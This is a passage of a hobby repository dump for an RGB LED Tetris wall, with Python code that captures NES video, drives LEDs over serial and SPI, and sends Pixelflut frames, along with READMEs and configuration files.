score\n self.extract_score(img.crop((481, 125, 481 + 122, 125 + 16)).filter(ImageFilter.SMOOTH))\n #self.extract_score(img.crop((481, 125, 481 + 122, 125 + 16)))\n\n # number of level\n self.extract_level(img.crop((522, 333, 522 + 40, 333 + 16)).filter(ImageFilter.SMOOTH))\n #self.extract_level(img.crop((522, 333, 522 + 40, 333 + 16)))\n\n #return self.img_leds\n return self.enhance_image(self.img_leds)\n\n\n#for debug\nimport numpy as np\nimport time\nimport datetime\n\nif __name__ == \"__main__\":\n im = Image.open(\"nes_cut.png\").convert(_FORMAT)\n gray = im.getpixel((6,6))\n print(\"debug gray\", gray)\n game = NesTetris(_gray=gray)\n for n in range(5):\n timestart = datetime.datetime.now()\n leds = game.transform_frame(im).convert(\"RGB\")\n timefin = datetime.datetime.now()\n print(\"leds\", np.array(leds, dtype=np.uint8).shape, \"transform_t: {ptime} in ms\".format(ptime=(timefin-timestart).microseconds / 1000))\n leds.save(\"leds.png\", \"PNG\")\n im.convert(\"RGB\").save(\"debug1.png\", \"PNG\")\n\n" }, { "alpha_fraction": 0.7386363744735718, "alphanum_fraction": 0.7386363744735718, "avg_line_length": 18.44444465637207, "blob_id": "6d5d332b3072fb3a8700bac57fa2d66742e5ee36", "content_id": "1e9cacefbb4c36acc48459ca00c840ab0923646a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 176, "license_type": "no_license", "max_line_length": 65, "num_lines": 9, "path": "/raspi_preproc/workbench/streaming/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\nRun\n\n . 
../envs/tetris-wall-rgb/bin/activate\n python stream.py\n\nCurrently there is a caveat where you need to stream with mplayer\nonce to make capturing work:\n\n\tmake play\n" }, { "alpha_fraction": 0.5476772785186768, "alphanum_fraction": 0.5678483843803406, "avg_line_length": 18.710844039916992, "blob_id": "345f7d5d8be23435e93c3b39328b0189cd683118", "content_id": "d326ccb334e32f86980d1dadb07d397ecbdc47c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1636, "license_type": "no_license", "max_line_length": 71, "num_lines": 83, "path": "/pixelflut/canvas_brain.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import logging\nlog = logging.getLogger('brain')\n\nlog.debug('lol')\n\nticks = 0\n\n\n@on('RESIZE')\ndef resize(canvas):\n global log\n log.debug('resize event')\n\n\n@on('QUIT')\ndef quit(canvas):\n global log\n log.debug('quit event')\n\n\n@on('TICK')\ndef tick(canvas):\n global log\n global ticks\n if ticks % 50 == 0:\n print('.')\n ticks += 1\n\n\n@on('CONNECT')\ndef connect(canvas, client):\n global log\n log.debug('connect event %s', client)\n\n\n@on('DISCONNECT')\ndef disconnect(canvas, client):\n global log\n log.debug('disconnect event %s', client)\n\n\n@on('COMMAND-PX')\ndef command_px(canvas, client, *args):\n global log\n log.debug('px command event %s %s', client, args)\n assert len(args) == 3\n\n x, y, c = args\n c = c.lower().strip('#')\n\n assert x.isdecimal()\n assert y.isdecimal()\n assert 6 <= len(c) <= 8\n\n # pad optional alpha\n c += 'f' * (8 - len(c))\n\n x, y = int(x), int(y)\n r, g, b, a = tuple(int(c[i:i+2], 16) for i in (0, 2, 4, 6))\n\n canvas.set_pixel(x, y, r, g, b, a)\n return True\n\n\n@on('COMMAND-WL')\ndef command_wl(canvas, client, *args):\n import base64\n global log\n log.debug(\"wl command event %s %d args\", client, len(args))\n w, h = canvas.size\n raw_size = w * h * canvas.depth\n b64_size = int(raw_size + raw_size/3)\n assert 
len(args) == 1\n base = args[0]\n assert len(base) == b64_size\n data = base64.b64decode(base)\n assert len(data) == w * h * canvas.depth\n\n for y in range(h):\n for x in range(w):\n p = (y*w + x) * 3\n canvas.set_pixel(x, y, data[p], data[p+1], data[p+2], 0xff)\n return True\n" }, { "alpha_fraction": 0.6779661178588867, "alphanum_fraction": 0.7740113139152527, "avg_line_length": 58, "blob_id": "d9e64f6199fd5ae46df2d368baf9bd707ced7a1d", "content_id": "ae39b5fb4462df922cec030196423fc4fab3e760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 177, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/raspi_preproc/workbench/streaming/Makefile", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "play:\n\tmplayer tv:// -tv driver=v4l2:norm=PAL:width=720:height=576:outfmt=uyvy:device=/dev/video0:input=0:\\\nalsa:adevice=hw.1:audiorate=48000:forceaudio:immediatemode=0 -ao sdl\n" }, { "alpha_fraction": 0.4587155878543854, "alphanum_fraction": 0.6788991093635559, "avg_line_length": 14.571428298950195, "blob_id": "cff2e198d9170fd9b18f0ba29cd07f9b50075f7e", "content_id": "70c9a50a3cd835569802947dc23c4f4bf812e9bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 109, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/pixelflut/requirements.txt", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "gevent==1.3.6\ngreenlet==0.4.15\nnumpy==1.15.2\npigpio==1.41\npkg-resources==0.0.0\npycairo==1.17.1\npygame==1.9.4\n" }, { "alpha_fraction": 0.7473118305206299, "alphanum_fraction": 0.7634408473968506, "avg_line_length": 30, "blob_id": "eae72862876a54f0db00f50541184298a7e7f6c5", "content_id": "fe44b831e36632809c6efa4816c1deaf5b4345b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 186, "license_type": 
"no_license", "max_line_length": 68, "num_lines": 6, "path": "/run_preproc.sh", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# run the whole raspi proprocessing pipeline for teh rgb-tetris-wall\n\ncd /home/pi/rgb-tetris-wall/raspi_preproc/\n. /home/pi/env/bin/activate\nDISPLAY=:0.0 python3 controller.py\n" }, { "alpha_fraction": 0.5748792290687561, "alphanum_fraction": 0.6367149949073792, "avg_line_length": 35.48214340209961, "blob_id": "c864517071fc2abe35e483c355b03b343419ed76", "content_id": "bf41c07b91c786f9131c7c5bda1c3f74545a1c91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2070, "license_type": "no_license", "max_line_length": 242, "num_lines": 56, "path": "/raspi_preproc/workbench/send_serial.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import serial\nimport time\nimport datetime\nimport base64\nimport os\nUSBPORT = os.environ.get(\"USBPORT\", '/dev/ttyACM0') #check correct port first\n#USBPORT = '/dev/ttyAMA0' #check correct port first\n#USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 #16\nNUM_LEDS_V = 24 #24\nFPS = 25\nWAITTIME_VSTREAM = float(os.environ.get('WAITTIME_VSTREAM', '0.040')) #40 ms\nWAITTIME_ISTREAM = 1.0 #40 ms\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\ns = serial.Serial(USBPORT, 115200*3) #57600 dc115200 230400\ntime.sleep(2)\n\nleds = [[0 for i in range(NUM_LEDS_V)] for j in range(NUM_LEDS_H)]\ncounter = 0\ndelaycounter = 1\ndelay = 1 #FPS 1 for testing\ndata_read = 0\n\nprint(\"Start sending\")\nwhile True:\n timestart = datetime.datetime.now()\n\n data_read = int(s.read(1))\n # mode - video stream: 25 frames per second with 6 bit/px\n if (data_read==3):\n data_prep_start = datetime.datetime.now()\n for i in range(NUM_LEDS_H):\n for j in range(NUM_LEDS_V):\n leds[i][j] = (4*(counter-i+j))%64\n #leds[i][j] = 
256//NUM_LEDS_V*((counter+i+j)%NUM_LEDS_V)\n #leds[i][j] = 63\n if (delaycounter%delay == 0):\n counter=(counter+1)%NUM_LEDS_H\n delaycounter=(delaycounter+1)%delay\n\n data_b64 = ''.join(b64dict[m] for n in leds for m in n)\n data_dec = base64.b64decode(data_b64)\n #print(len(data_b64),data_b64)\n #print(len(data_dec),data_dec)\n\n data_send_start = datetime.datetime.now()\n s.write(data_dec)\n #s.write(bytes([m for n in leds for m in n])) #undecoded format\n s.flush()\n \n timefin = datetime.datetime.now()\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart).microseconds))\n print(\"arduino_mode:\",data_read,\"prep_t:\", 0.000001*(data_send_start-data_prep_start).microseconds, \"write_t:\", 0.000001*(timefin-data_send_start).microseconds, \"process_t:\", 0.000001*(timefin-timestart).microseconds, \"wait_t:\", waittime)\n time.sleep(waittime) \n\n\n\n" }, { "alpha_fraction": 0.7497206926345825, "alphanum_fraction": 0.7519553303718567, "avg_line_length": 34.79999923706055, "blob_id": "35be10e93201b9ab92053047c7e781cb2e27e2ab", "content_id": "a3ace8ac73b6957d22b099281a272b300d9bfed0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 895, "license_type": "no_license", "max_line_length": 75, "num_lines": 25, "path": "/reels/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# LED Wall Reels\nReels are scripts that create animations for the LED Wall. 
Images are sent \nusing our extended Pixelflut protocol (that has an additional command to \nsend the whole content for the wall in one go in about 1.6kB).\n\nA module named `fluter` is provided to make it dead easy to write reels;\njust import the function you need from `fluter` and send pixels, \nPIL-images, RAW-RGB-image-bytestrings, or arrays (numpy or native).\n\nLook at the basic examples, like `randimg.py` or `gol.py`, to find out \nhow to use the module.\n\n# Run reels on your PC\nCreate venv for the pixelflut script (see directory `pixelflut`) and \nstart it in canvas mode:\n\n $ python pixelflut.py canvas_brain.py\n\nIn a second terminal enter the `reels` directory and run whatever reel \nyou like, e.g. \n\n $ python wator.py\n\nThat's it, basically. You should see the animation of the reel in the \npygame window.\n" }, { "alpha_fraction": 0.463609904050827, "alphanum_fraction": 0.49563318490982056, "avg_line_length": 18.898550033569336, "blob_id": "35c0a39429212925063ac337bac0d2a491d12e05", "content_id": "5b798452df9eff23f28493b1c80f4ccf3633c3ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1374, "license_type": "no_license", "max_line_length": 77, "num_lines": 69, "path": "/reels/gol.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nRGB-Reel Conway's Game of Life\n\nSimple implementation of Conway's Game of Life as reel for your wall. 
Runs in\na torus world and get's initialized randomly.\n\nSee https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\n\ncreated by kratenko\n\"\"\"\nimport numpy as np\nimport time\nfrom fluter import Fluter\n\nfluter = Fluter()\n\nw = 16\nh = 24\n\nglider = [[1, 0, 0],\n [0, 1, 1],\n [1, 1, 0]]\n\nf = np.random.randint(2, size=(h, w), dtype=np.uint8)\n#f = np.zeros((h, w), dtype=np.uint8)\n#f[:3, :3] = glider\n\n\ndef neigh(f, pos):\n x, y = pos\n xa = (x - 1) % w\n xb = x\n xc = (x + 1) % w\n ya = (y - 1) % h\n yb = y\n yc = (y + 1) % h\n n = 0\n n += f[ya, xa] + f[ya, xb] + f[ya, xc]\n n += f[yb, xa] + 0 + f[yb, xc]\n n += f[yc, xa] + f[yc, xb] + f[yc, xc]\n return n\n\n\ndef next_gen(fin):\n fout = fin.copy()\n for y in range(h):\n for x in range(w):\n n = neigh(fin, (x, y))\n if fin[y, x]:\n fout[y, x] = 1 if 1 < n < 4 else 0\n else:\n fout[y, x] = 1 if n == 3 else 0\n return fout\n\n\ndef to_raw(fin):\n dead = b\"\\x00\\x00\\x80\"\n live = b\"\\x00\\xff\\x00\"\n d = []\n for y in range(h):\n for x in range(w):\n d += [live] if f[y, x] else [dead]\n return b\"\".join(d)\n\n\nwhile True:\n fluter.send_raw(to_raw(f))\n f = next_gen(f)\n time.sleep(.2)\n\n" }, { "alpha_fraction": 0.704119861125946, "alphanum_fraction": 0.7465667724609375, "avg_line_length": 20.675676345825195, "blob_id": "be8fedb6e84f53998a67970ec0606becdac7ed9e", "content_id": "dc8776cf250a327c4c23c0d4a8f481dde73f7558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 801, "license_type": "no_license", "max_line_length": 82, "num_lines": 37, "path": "/readme.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "== Synopsis: ==\n\n\n== Hardware: ==\n\n- WS2811 5050 LED strips (60leds/m, 20ics/m)\n- 12V power supply (HP 750W HSTNS-PL18), provides 62.5A/12V\n- Arduino Mega\n- Raspberry PI 3 B\n- EasyCAP USB grabber with Syntek STK1160 chip set\n- Microphone\n- Switches, Buttons, Photo-resistor, 
\n\nPhoto-resistor:\n- Measures light for regulating the overall brightness of the leds\n- Basic photo-resistor with voltage divider via 5k1ohm resistor for input pulldown\n\nMicrophone:\n- Measures sound for simple beat detection that can get visualised\n- Basic line-in microphone\n- Microphone amplifier (with poti) Iduino SE019\n\n\n== Software: ==\n\n= Arduino: =\nPurpose:\n\nLibraries (C):\n- https://playground.arduino.cc/Code/ElapsedMillis\n- https://github.com/FastLED/FastLED\n\n= Raspberry PI =\nPurpose:\n\nLibraries (python):\n- pyserial" }, { "alpha_fraction": 0.4040403962135315, "alphanum_fraction": 0.6767676472663879, "avg_line_length": 13.285714149475098, "blob_id": "ac3b86628b68952a3f6fcecaf2c8e542879a1c86", "content_id": "74a4877336e9b77757ac5a077d4100ff0b2f3a8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 99, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/raspi_preproc/requirements.txt", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "gevent==1.3.6\nnumpy==1.15.2\nPillow==5.1.0\npygame==1.9.4\nPyV4L2Camera==0.1a2\npyv4l2==1.0.2\nv4l2==0.2" }, { "alpha_fraction": 0.6133610010147095, "alphanum_fraction": 0.6368985772132874, "avg_line_length": 25.504587173461914, "blob_id": "28e5d4ea978d9322635fb60d697580d603d09fb9", "content_id": "e2b2be93c581118ec67a200194ee775a0a62fb5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2889, "license_type": "no_license", "max_line_length": 77, "num_lines": 109, "path": "/raspi_preproc/workbench/streaming/stream.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import os\nimport argparse\nimport numpy as np\nfrom time import sleep\nfrom time import time\n\nfrom pyv4l2.frame import Frame\nfrom pyv4l2.control import Control\n\nfrom lib.encoding import UYVY_RAW2RGB_PIL\nfrom lib.visualization import 
send_visdom\nfrom lib.cropping import extract_single_player_area\nfrom lib.cropping import extract_colours\n\nimport pigpio\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--width', type=int, default=720)\nparser.add_argument('--height', type=int, default=576)\nparser.add_argument('--scale', type=float, default=1.)\nparser.add_argument('--visdom-server', type=str, default='http://localhost')\nparser.add_argument('--visdom', action='store_true')\nparser.add_argument('--device', type=str, default='/dev/video0')\n\nargs = parser.parse_args()\n\nw = int(args.width // args.scale)\nh = int(args.height // args.scale)\n\nos.system('v4l2-ctl -d {device} --set-fmt-video width={w},height={h}'.format(\n device=args.device, w=w, h=h))\n\nframe = Frame(args.device)\n\nif args.visdom:\n import visdom\n vis = visdom.Visdom(server=args.visdom_server)\n\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect spi\")\n exit()\nspi = pi.spi_open(0, 750000, 0)\nSYNC_PIN = 24\npi.set_mode(SYNC_PIN, pigpio.INPUT)\n\nNUM_LEDS_H = 16\nNUM_LEDS_V = 24\n\nleds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n\ndef send_spi(colours):\n colours = colours.convert('HSV')\n print(colours)\n for x in range(colours.width):\n for y in range(colours.height):\n px = colours.getpixel((x, y))\n leds[x, colours.height - y - 1] = px\n data_dec = leds.transpose(1, 0, 2).flatten().tobytes()\n # wait for spi\n print(\"waiting for spi\")\n wait = True\n print(\"debug -\", \"pi.read_bank_1:\", pi.read_bank_1())\n while wait:\n v = (pi.read_bank_1() >> SYNC_PIN) & 1\n if v == 1:\n wait = False\n print(\"debug -\", \"pi.read_bank_1:\", pi.read_bank_1())\n pi.spi_write(spi, data_dec)\n\ndef send_pi(img):\n x_tl = 270/720 * img.width\n y_tl = 152/576 * img.height\n x_br = 475/720 * img.width\n y_br = 474/576 * img.height\n rect = (x_tl, y_tl, x_br, y_br)\n\n area = extract_single_player_area(img, rect)\n\n if args.visdom:\n send_visdom(vis, area.convert('RGBA'), win='crop img')\n\n 
colours = extract_colours(area)\n send_spi(colours)\n\n if args.visdom:\n send_visdom(vis, colours.convert('RGBA'), win='crop color img')\n\nwhile True:\n time_in = time()\n frame_data = frame.get_frame()\n\n data = np.array(list(frame_data), dtype='uint8')\n time_cap = time()\n\n img = UYVY_RAW2RGB_PIL(data, w, h)\n\n #import pdb; pdb.set_trace()\n\n if args.visdom:\n send_visdom(vis, img.convert('RGBA'), win='cap img')\n\n send_pi(img)\n\n time_out = time()\n\n print('sent image, time image: {}, time cap: {}'.format(\n (time_out - time_in), (time_cap - time_in)))\n" }, { "alpha_fraction": 0.5617936849594116, "alphanum_fraction": 0.5822092890739441, "avg_line_length": 29.82022476196289, "blob_id": "fa7bd4014d24da5133227178335883ef838f7667", "content_id": "e65258fd9cb2a81b90b589ccf8b346a5f2ab2163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2743, "license_type": "no_license", "max_line_length": 75, "num_lines": 89, "path": "/reels/fluter/__init__.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nModule for sending to deep pixelflut server.\n\nSimple functions to send to a pixelflut server from a python script.\nHandles connecting to the server on its own (but does never disconnect).\nIn addition to setting individual pixels it supports a command \"WL\" to\nsend a complete picture to our LED-Tetris-Wall.\n\nTo specify host/port of target server, set environment variable\nPIXELFLUT_HOST to \"hostname\" or to \"hostname:port\".\n\nCreated by deep cyber -- the deepest of all cybers.\n\"\"\"\n\nimport socket\nimport base64\nimport numpy as np\nimport os\n\n\nclass Fluter:\n DEFAULT_HOST = None\n\n def __init__(self, host=DEFAULT_HOST, width=16, height=24, depth=3):\n self.host, self.port = self._parse_host(host)\n self.width = width\n self.height = height\n self.depth = depth\n self.socket = None\n\n def _parse_host(self, host):\n if host is Fluter.DEFAULT_HOST:\n 
host = os.environ.get(\"PIXELFLUT_HOST\", \"localhost:1234\")\n parts = host.split(\":\")\n if len(parts) == 2:\n return parts[0], int(parts[1])\n else:\n return parts[0], 1234\n\n def _connect(self):\n # TODO: add a reconnect mechanic\n if not self.socket:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.connect((self.host, self.port))\n\n def send_pixel(self, pos, colour):\n \"\"\"\n Set a single pixel on pixelflut server. Connects on demand.\n :param pos: (x, y) -- position of pixel to set\n :param colour: (r, g, b) or (r, g, b, a) -- colour to set pixel to\n :return:\n \"\"\"\n assert len(pos) == 2\n assert 3 <= len(colour) <= 4\n self._connect()\n args = tuple(pos) + tuple(colour)\n if len(colour) == 3:\n self.socket.send(b\"PX %d %d %02x%02x%02x\\n\" % args)\n else:\n self.socket.send(b\"PX %d %d %02x%02x%02x%02x\\n\" % args)\n\n def send_raw(self, data):\n \"\"\"\n Send 16x24 raw image data (RGB, uint8) to server.\n :param data:\n :return:\n \"\"\"\n assert len(data) == self.width * self.height * self.depth\n self._connect()\n encoded = base64.b64encode(data)\n self.socket.send(b\"WL \" + encoded + b\"\\n\")\n\n def send_image(self, image):\n \"\"\"\n Send image to server (scales to 16x24).\n :param image:\n :return:\n \"\"\"\n image = image.resize((self.width, self.height)).convert(\"RGB\")\n self.send_raw(image.tobytes())\n\n def send_array(self, arr):\n \"\"\"\n Send array data to server. 
Must have 16*24*3 uint8 values.\n :param arr:\n :return:\n \"\"\"\n flat = np.array(arr).flatten()\n self.send_raw(flat)\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 5.25, "blob_id": "93113b190a6c5055a9586446a29f1cb8699879dc", "content_id": "df9ec763ecea40f435545608ce28297ff80f8f3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 25, "license_type": "no_license", "max_line_length": 6, "num_lines": 4, "path": "/raspi_preproc/workbench/streaming/requirements.txt", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "Pillow\npyv4l2\nsix\nvisdom\n" }, { "alpha_fraction": 0.5584415793418884, "alphanum_fraction": 0.600649356842041, "avg_line_length": 43, "blob_id": "e3fc6991c6ed60a86e9a4a893d8e8c01956ba7c3", "content_id": "18d5dd1f9f11fce7c4fa0a598d5f559675fa8d15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 79, "num_lines": 7, "path": "/raspi_preproc/workbench/streaming/lib/encoding.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from PIL import Image\n\ndef UYVY_RAW2RGB_PIL(data, w, h):\n y=Image.frombytes('L',(w,h),data[1::2].copy())\n u=Image.frombytes('L',(w,h),data[0::4].reshape(w//2,h).copy().repeat(2, 0))\n v=Image.frombytes('L',(w,h),data[2::4].reshape(w//2,h).copy().repeat(2, 0))\n return Image.merge('YCbCr',(y,u,v))\n" }, { "alpha_fraction": 0.5366550087928772, "alphanum_fraction": 0.5602698922157288, "avg_line_length": 33.2400016784668, "blob_id": "e7605bfe2926d84ae0385fd958ab71e90a513373", "content_id": "50a278131f98c057277cc2f8a5a4ee56877326d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7707, "license_type": "no_license", "max_line_length": 116, "num_lines": 225, "path": "/raspi_preproc/stream_nes.py", 
"repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import os\nimport base64\nimport numpy as np\n#from pyv4l2.frame import Frame\nfrom PyV4L2Camera.camera import Camera\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom nes_tetris import NesTetris\n\n\n\"\"\" Computational costs on raspi:\n- grab the frame: 13-17 ms\n- convert frame to RGB PIL img: 5 - 6 ms\n- cut game area: 2-3 ms\n- calculate led pixels from cutted rgb img (including smooth filters): 19 - 27 ms\noverall costs: 40-52 ms\n\"\"\"\n\nclass StreamNES:\n # -s, --set - standard = < num >\n # pal or pal - X(X=B / G / H / N / Nc / I / D / K / M / 60)(V4L2_STD_PAL)\n # ntsc or ntsc - X(X=M / J / K)(V4L2_STD_NTSC)\n # secam or secam - X(X=B / G / H / D / K / L / Lc)(V4L2_STD_SECAM)\n\n def __init__(self, _num_leds_h=16, _num_leds_v=24, _ntsc=True, feedback=False):\n self.num_leds_h = _num_leds_h\n self.num_leds_v = _num_leds_v\n self.ntsc = _ntsc\n self.leds = np.zeros((_num_leds_v, _num_leds_h, 3)) #should be not necessary\n self.b64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n if self.ntsc:\n self.mode = 'NTSC'\n self.fps = 30\n self.width = 720\n self.height = 480\n else:\n self.mode = 'PAL-B'\n self.fps = 25\n self.width = 720\n self.height = 576\n self.format = 'UYVY'\n self.b = 3 # 3 2\n #self.color = '' #''smpte170'\n if (feedback):\n fb = 'verbose'\n else:\n fb = 'silent'\n\n self.scale = 1.\n self.device = '/dev/video0'\n self.w = int(self.width // self.scale)\n self.h = int(self.height // self.scale)\n\n self.game = NesTetris(_num_leds_h=_num_leds_h, _num_leds_v=_num_leds_v)\n\n #-p 25\n os.system(\n 'v4l2-ctl -d {device} -s {m} --set-fmt-video width={w},height={h},pixelformat={pf} --{fb}'.format(\n #'v4l2-ctl -d {device} -p {fps} -s {m} --set-fmt-video width={w},height={h},pixelformat={pf} --{fb}'.format(\n device=self.device, fps=self.fps, m=self.mode, w=self.w, h=self.h, pf=self.format, fb=fb))\n #self.frame = Frame(self.device)\n 
self.frame = Camera(self.device)\n\n def Frame_UYVY2YCbCr_PIL(self, w, h, frame_data):\n data = np.fromstring(frame_data, dtype='uint8')\n y = Image.frombytes('L', (w, h), data[1::2].copy())\n u = Image.frombytes('L', (w, h), data[0::4].copy().repeat(2, 0))\n v = Image.frombytes('L', (w, h), data[2::4].copy().repeat(2, 0))\n return Image.merge('YCbCr', (y, u, v))\n\n def read_frame_dec(self):\n self.leds = self.read_frame()\n #TODO convert to 64 color palette, thus the remainder does not work\n data_b64 = ''.join(self.b64dict[m] for n in self.leds for m in n)\n data_dec = base64.b64decode(data_b64)\n\n return data_dec\n\n def read_frame(self):\n\n #get a frame from the device\n #frame_data = self.frame.get_frame()\n while True:\n frame_data = self.frame.get_frame()\n if len(frame_data) == self.w * self.h * self.b:\n break\n\n #img = self.Frame_UYVY2YCbCr_PIL(self.w, self.h, frame_data)\n img = Image.frombytes('RGB', (self.w, self.h), frame_data, 'raw', 'RGB')\n\n #cut the frame to game size (depending on game) ane transform it for the leds\n #img_game = self.game.extract_game_area(img).filter(ImageFilter.SMOOTH).convert(\"HSV\")\n img_game = self.game.extract_game_area(img, ntsc=self.ntsc)\n img_leds = self.game.transform_frame(img_game)\n #img to array conversion\n self.leds = np.array(img_leds)\n\n #debug:\n #self.leds = img_leds\n #img_game.convert(\"RGB\").save(\"nes_cut.png\", \"PNG\")\n #img_leds.convert(\"RGB\").save(\"leds.png\", \"PNG\")\n\n return self.leds\n\n\n # for debug:\n def read_frame0(self):\n frame_data = self.frame.get_frame()\n return frame_data\n def read_frame1(self):\n #frame_data = self.frame.get_frame()\n while True:\n frame_data = self.frame.get_frame()\n if len(frame_data) == self.w * self.h * self.b:\n break\n else:\n print(\"debug - \", \"frame not correct\", \"frame_data_len:\",\n len(frame_data))\n return frame_data\n def read_frame2(self, frame_data):\n #img = self.Frame_UYVY2YCbCr_PIL(self.w, self.h, frame_data)\n img = 
Image.frombytes('RGB', (self.w, self.h), frame_data, 'raw', 'RGB')\n return img\n def read_frame3(self, img):\n #img_game = self.game.extract_game_area(img).filter(ImageFilter.SMOOTH).convert(\"HSV\")\n img_game = self.game.extract_game_area(img, ntsc=self.ntsc)\n return img_game\n def read_frame4(self, img_game):\n img_leds = self.game.transform_frame(img_game)\n self.leds = img_leds\n return self.leds\n # end for debug\n\n\n#for debug\nimport time\nimport datetime\n#import visdom\nfrom six import BytesIO\nimport base64 as b64\n\ndef send_visdom(vis, im, win=None, env=None, opts=None):\n opts = {} if opts is None else opts\n\n opts['height'] = opts.get('height', im.height)\n opts['width'] = opts.get('width', im.width)\n\n buf = BytesIO()\n im.save(buf, format='PNG')\n b64encoded = b64.b64encode(buf.getvalue()).decode('utf-8')\n\n data = [{\n 'content': {\n 'src': 'data:image/png;base64,' + b64encoded,\n 'caption': opts.get('caption'),\n },\n 'type': 'image',\n }]\n\n return vis._send({\n 'data': data,\n 'win': win,\n 'eid': env,\n 'opts': opts,\n })\n\nif __name__ == \"__main__\":\n iterations = 250\n is_visdom = False\n # command line:$ python3 -m visdom.server\n WAITTIME_VSTREAM = 1.0 #0.040 # 40 ms\n print(\"Start StreamNES...\")\n stream = StreamNES(feedback=True)\n\n visd_server = 'http://localhost'\n if is_visdom:\n vis = visdom.Visdom(server=visd_server)\n\n print(\"Start reading frames...\")\n for i in range(iterations):\n timestart = datetime.datetime.now()\n\n print(\"read frame...\")\n\n #stream.read_frame()\n #print(\"...done\")\n\n a = stream.read_frame1()\n print(\"...done1\")\n timestart_a = datetime.datetime.now()\n b = stream.read_frame2(a)\n print(\"...done2\")\n timestart_b = datetime.datetime.now()\n c = stream.read_frame3(b)\n print(\"...done3\")\n timestart_c = datetime.datetime.now()\n d = stream.read_frame4(c)\n print(\"...done4\")\n\n timefin = datetime.datetime.now()\n c.convert(\"RGB\").save(\"nes_cut.png\", \"PNG\")\n 
d.convert(\"RGB\").save(\"leds.png\", \"PNG\")\n if is_visdom:\n send_visdom(vis, c.convert('RGBA'), win='source')\n send_visdom(vis, d.resize((160,240)).convert('RGBA'), win='led-pixel-wall')\n\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart).microseconds))\n\n time_a = timestart_a - timestart\n time_b = timestart_b - timestart_a\n time_c = timestart_c - timestart_b\n time_d = timefin - timestart_c\n time_total = time_a + time_b + time_c + time_d\n print(\"grab_t: {time_a}, conv_t: {time_b}, \"\n \"cut_t: {time_c}, smooth_trans_t: {time_d}, \"\n \"total_t: {time_total}, wait_t: {waittime} in ms\".format(\n time_a=time_a.microseconds / 1000,\n time_b=time_b.microseconds / 1000,\n time_c=time_c.microseconds / 1000,\n time_d=time_d.microseconds / 1000,\n time_total=time_total.microseconds / 1000,\n waittime=waittime * 1000,\n ))\n\n time.sleep(waittime)\n\n\n\n" }, { "alpha_fraction": 0.556917667388916, "alphanum_fraction": 0.6038528680801392, "avg_line_length": 26.190475463867188, "blob_id": "c5da94726fa3057efe2021159312a6b54c221ff2", "content_id": "ae05f470f2ab1679dd6fa55192f097a6af3e96e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2855, "license_type": "no_license", "max_line_length": 91, "num_lines": 105, "path": "/raspi_preproc/workbench/send_spi.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "mport serial\nimport time\nimport datetime\nimport base64\nimport pigpio\nimport numpy as np\n\nUSBPORT = 